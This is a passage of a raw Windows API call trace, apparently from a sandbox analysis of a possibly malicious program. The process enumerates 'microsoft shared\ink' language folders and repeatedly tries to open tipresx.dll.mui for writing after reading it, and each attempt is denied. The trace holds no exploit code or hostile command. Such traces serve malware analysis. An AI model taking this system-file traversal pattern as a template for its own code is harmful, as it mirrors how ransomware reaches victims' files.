lpWideCharStr=0x85bc0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui") returned 73 [0099.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.178] GetFileType (hFile=0x418) returned 0x1 [0099.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85bc0 | out: hHeap=0x20000) returned 1 [0099.178] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.178] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.178] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.178] CloseHandle (hObject=0x418) returned 1 [0099.179] AreFileApisANSI () returned 1 [0099.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x856c0 [0099.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui") returned 73 [0099.179] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.179] GetLastError () returned 0x5 [0099.179] GetLastError () returned 0x5 [0099.179] SetLastError (dwErrCode=0x5) [0099.179] GetLastError () returned 0x5 [0099.179] SetLastError (dwErrCode=0x5) [0099.179] GetLastError () returned 0x5 [0099.179] SetLastError (dwErrCode=0x5) [0099.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0099.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.179] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8cee0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧Ⰰ")) returned 0 [0099.179] FindClose (in: hFindFile=0x78190 | out: hFindFile=0x78190) returned 1 [0099.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0099.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0099.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0099.180] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.180] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.180] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.180] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0099.180] AreFileApisANSI () returned 1 [0099.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR", lpUsedDefaultChar=0x0) returned 57 [0099.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.180] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.180] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0099.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.181] AreFileApisANSI () returned 1 [0099.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0099.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR") returned 57 [0099.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.181] GetLastError () returned 0x5 [0099.181] GetLastError () returned 0x5 [0099.181] SetLastError (dwErrCode=0x5) [0099.181] GetLastError () returned 0x5 [0099.181] SetLastError (dwErrCode=0x5) [0099.181] GetLastError () returned 0x5 [0099.181] SetLastError (dwErrCode=0x5) [0099.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0099.181] AreFileApisANSI () returned 1 [0099.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0099.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR") returned 57 [0099.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.182] GetLastError () returned 0x5 [0099.182] GetLastError () returned 0x5 [0099.182] SetLastError (dwErrCode=0x5) [0099.182] GetLastError () returned 0x5 [0099.182] SetLastError (dwErrCode=0x5) [0099.182] GetLastError () returned 0x5 [0099.182] SetLastError (dwErrCode=0x5) [0099.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0099.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.182] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.182] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.182] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.182] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0099.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0099.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.182] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0099.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0099.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0099.182] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78250 [0099.183] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.183] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0099.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.183] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.184] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.184] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.184] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.184] AreFileApisANSI () returned 1 [0099.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0099.184] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0099.184] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.184] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.184] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0099.184] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.184] AreFileApisANSI () returned 1 [0099.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.184] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85620 [0099.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui") returned 73 [0099.184] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.184] GetFileType (hFile=0x418) returned 0x1 [0099.184] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0099.184] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.185] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.185] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.185] CloseHandle (hObject=0x418) returned 1 [0099.185] AreFileApisANSI () returned 1 [0099.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x851c0 [0099.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui") returned 73 [0099.185] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.185] GetLastError () returned 0x5 [0099.185] GetLastError () returned 0x5 [0099.185] SetLastError (dwErrCode=0x5) [0099.185] GetLastError () returned 0x5 [0099.186] SetLastError (dwErrCode=0x5) [0099.186] GetLastError () returned 0x5 [0099.186] SetLastError (dwErrCode=0x5) [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0099.186] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.186] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.186] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c5b0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧Ⰰ")) returned 0 [0099.186] FindClose (in: hFindFile=0x78250 | out: hFindFile=0x78250) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 